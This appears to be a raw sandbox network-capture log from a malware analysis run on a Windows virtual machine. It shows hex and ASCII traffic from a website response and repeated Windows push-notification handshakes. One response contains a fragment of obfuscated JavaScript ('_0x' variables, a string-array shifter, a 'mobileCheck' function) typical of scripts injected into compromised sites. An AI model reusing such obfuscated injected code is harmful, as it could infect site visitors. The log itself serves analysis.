7a 65 3a 20 31 38 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 4f 75 72 20 77 65 62 73 69 74 65 20 61 6e 64 20 69 74 27 73 20 73 Data Ascii: class="m-0 p-0" src="https://icogacc.com/logo-png.png"/> <h2 class="mt-5 text-dark p-0 mt-0" style="font-size: 40px;"><strong>We're Offline</strong></h2> <p style="font-size: 18px; line-height: 1.5;">Our website and it's s
2025-01-14 23:30:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-14 23:30:11 UTC	1476	IN	Data Raw: 35 62 64 0d 0a 63 63 65 73 73 22 3a 22 62 6f 74 74 6f 6d 5f 6e 65 77 73 6c 65 74 74 65 72 22 7d 7d 7d 2c 22 6e 61 6d 65 22 3a 22 62 6f 74 74 6f 6d 2d 6e 65 77 73 6c 65 74 74 65 72 22 2c 22 73 75 70 70 6f 72 74 22 3a 6e 75 6c 6c 7d 2c 22 62 6f 74 74 6f 6d 2d 61 62 6f 75 74 22 3a 7b 22 73 65 63 74 69 6f 6e 22 3a 22 62 6f 74 74 6f 6d 20 61 62 6f 75 74 22 2c 22 68 65 61 64 65 72 22 3a 6e 75 6c 6c 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 53 68 6f 72 74 20 41 62 6f 75 74 22 2c 22 74 65 78 74 22 3a 22 3c 70 3e 69 43 6f 67 2c 20 70 72 65 76 69 6f 75 73 6c 79 20 6b 6e 6f 77 6e 20 61 73 20 28 20 69 43 6f 67 20 41 6e 79 6f 6e 65 20 43 61 6e 20 43 6f 64 65 20 28 69 43 6f 67 2d 41 43 43 29 29 20 69 73 20 61 6e 20 61 66 66 69 6c 69 61 74 65 20 Data Ascii: 5bdccess":"bottom_newsletter"}}},"name":"bottom-newsletter","support":null},"bottom-about":{"section":"bottom about","header":null,"content":[{"title":"Short About","text":"<p>iCog, previously known as ( iCog Anyone Can Code (iCog-ACC)) is an affiliate
2025-01-14 23:30:11 UTC	8192	IN	Data Raw: 31 66 66 32 0d 0a 22 66 6f 6f 74 65 72 22 2c 22 70 72 65 76 69 65 77 22 3a 22 66 6f 6f 74 65 72 2d 63 6f 6c 75 6d 6e 73 2e 6a 70 67 22 7d 2c 22 62 6f 64 79 22 3a 7b 22 76 61 6c 75 65 22 3a 5b 7b 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 67 65 74 22 3a 22 69 6d 61 67 65 22 2c 22 63 6c 69 63 6b 22 3a 7b 22 74 61 67 22 3a 22 61 22 2c 22 75 73 65 22 3a 22 68 6f 6d 65 55 72 6c 22 2c 22 61 74 74 72 69 62 75 74 65 22 3a 22 63 6c 61 73 73 3a 6c 6f 67 6f 20 64 2d 66 6c 65 78 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 7d 7d 2c 7b 22 74 61 67 22 3a 22 70 22 2c 22 67 65 74 22 3a 22 74 65 78 74 22 7d 2c 7b 22 74 61 67 22 3a 22 64 69 76 22 2c 22 61 74 74 72 22 3a 7b 22 63 6c 61 73 73 22 3a 22 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 6d 74 2d 32 22 7d 2c 22 Data Ascii: 1ff2"footer","preview":"footer-columns.jpg"},"body":{"value":[{"tag":"img","get":"image","click":{"tag":"a","use":"homeUrl","attribute":"class:logo d-flex align-items-center"}},{"tag":"p","get":"text"},{"tag":"div","attr":{"class":"social-links mt-2"},"
2025-01-14 23:30:11 UTC	5155	IN	Data Raw: 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 33 65 33 61 34 37 29 7b 5f 30 78 33 30 37 63 30 36 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 30 37 63 30 36 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 31 39 32 32 2c 30 78 39 38 34 63 64 29 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 34 65 61 62 33 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 31 38 33 35 3d 5f 30 78 33 30 32 33 3b 77 69 6e 64 6f 77 5b 27 6d 6f 62 69 6c 65 43 68 65 63 6b 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 32 33 38 32 31 3d 5f 30 78 33 30 32 33 3b 6c 65 74 20 5f 30 78 33 39 39 35 30 30 3d 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 39 37 38 36 29 7b 63 6f 6e 73 74 20 5f 30 78 31 31 36 35 61 37 3d 5f Data Ascii: ['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_
2025-01-14 23:30:11 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-14 23:30:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:13 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 74 66 41 2f 4b 6e 41 7a 54 45 36 33 68 76 66 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 34 38 64 33 35 66 62 30 35 38 66 36 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: tfA/KnAzTE63hvfV.1Context: 4248d35fb058f6b
2025-01-14 23:30:13 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:30:13 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 74 66 41 2f 4b 6e 41 7a 54 45 36 33 68 76 66 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 34 38 64 33 35 66 62 30 35 38 66 36 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 57 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: tfA/KnAzTE63hvfV.2Context: 4248d35fb058f6b<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrwW
2025-01-14 23:30:13 UTC	217	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 74 66 41 2f 4b 6e 41 7a 54 45 36 33 68 76 66 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 34 32 34 38 64 33 35 66 62 30 35 38 66 36 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 196MS-CV: tfA/KnAzTE63hvfV.3Context: 4248d35fb058f6b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:30:13 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:30:13 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 63 32 41 38 38 5a 57 73 6c 30 71 63 67 61 65 52 62 67 4c 37 64 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: c2A88ZWsl0qcgaeRbgL7dQ.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:32 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 4d 45 33 6a 79 78 78 35 55 4b 50 5a 65 49 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 31 31 62 34 61 36 64 31 30 62 32 38 33 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: SME3jyxx5UKPZeIC.1Context: 7911b4a6d10b2831
2025-01-14 23:30:32 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:30:32 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 53 4d 45 33 6a 79 78 78 35 55 4b 50 5a 65 49 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 31 31 62 34 61 36 64 31 30 62 32 38 33 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: SME3jyxx5UKPZeIC.2Context: 7911b4a6d10b2831<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:30:32 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 4d 45 33 6a 79 78 78 35 55 4b 50 5a 65 49 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 31 31 62 34 61 36 64 31 30 62 32 38 33 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: SME3jyxx5UKPZeIC.3Context: 7911b4a6d10b2831<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:30:32 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:30:32 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 63 4f 44 77 4a 53 4e 48 54 30 43 55 62 4e 78 4a 7a 7a 41 6c 51 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: cODwJSNHT0CUbNxJzzAlQA.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:30:56 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 42 6a 41 74 4d 44 2f 36 70 45 36 42 70 78 6d 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 62 36 34 65 66 31 63 33 34 32 34 66 30 65 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: BjAtMD/6pE6BpxmL.1Context: ceb64ef1c3424f0e
2025-01-14 23:30:56 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:30:56 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 42 6a 41 74 4d 44 2f 36 70 45 36 42 70 78 6d 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 62 36 34 65 66 31 63 33 34 32 34 66 30 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: BjAtMD/6pE6BpxmL.2Context: ceb64ef1c3424f0e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:30:56 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 42 6a 41 74 4d 44 2f 36 70 45 36 42 70 78 6d 4c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 65 62 36 34 65 66 31 63 33 34 32 34 66 30 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: BjAtMD/6pE6BpxmL.3Context: ceb64ef1c3424f0e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:30:56 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:30:56 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 76 2b 79 43 44 52 56 50 51 55 65 75 43 2b 35 38 7a 58 48 51 79 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: v+yCDRVPQUeuC+58zXHQyg.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:31:30 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 59 79 6d 63 7a 5a 32 77 79 30 4b 7a 45 69 67 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 65 61 36 66 39 32 38 32 31 62 65 66 37 37 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: YymczZ2wy0KzEigo.1Context: 69ea6f92821bef77
2025-01-14 23:31:30 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-14 23:31:30 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 59 79 6d 63 7a 5a 32 77 79 30 4b 7a 45 69 67 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 65 61 36 66 39 32 38 32 31 62 65 66 37 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4c 37 44 41 61 77 73 33 79 66 47 52 39 6b 62 50 47 2f 35 72 6f 2f 58 58 4c 67 32 65 4c 73 36 30 74 6f 69 52 47 68 75 31 37 61 4f 34 67 56 43 49 71 37 6e 7a 77 30 6a 49 2f 69 5a 45 54 65 35 30 58 4b 71 58 69 66 63 2b 31 6a 4e 44 31 6b 35 55 41 4d 69 37 6c 4a 67 48 4e 63 7a 36 35 66 71 2f 32 73 72 5a 72 30 65 44 4b 4e 72 77 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: YymczZ2wy0KzEigo.2Context: 69ea6f92821bef77<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdL7DAaws3yfGR9kbPG/5ro/XXLg2eLs60toiRGhu17aO4gVCIq7nzw0jI/iZETe50XKqXifc+1jND1k5UAMi7lJgHNcz65fq/2srZr0eDKNrw
2025-01-14 23:31:30 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 59 79 6d 63 7a 5a 32 77 79 30 4b 7a 45 69 67 6f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 39 65 61 36 66 39 32 38 32 31 62 65 66 37 37 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: YymczZ2wy0KzEigo.3Context: 69ea6f92821bef77<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-14 23:31:30 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-14 23:31:30 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 37 56 44 71 38 76 53 4e 53 55 47 44 55 6c 34 4b 41 56 37 59 6b 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 7VDq8vSNSUGDUl4KAV7YkA.0Payload parsing failed.

Timestamp	Bytes transferred	Direction	Data
2025-01-14 23:32:17 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 77 56 57 5a 53 37 49 57 59 55 36 53 6b 4d 35 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 39 64 36 38 36 66 32 63 37 39 62 36 31 62 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: wVWZS7IWYU6SkM5p.1Context: 579d686f2c79b61b
2025-01-14 23:32:17 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
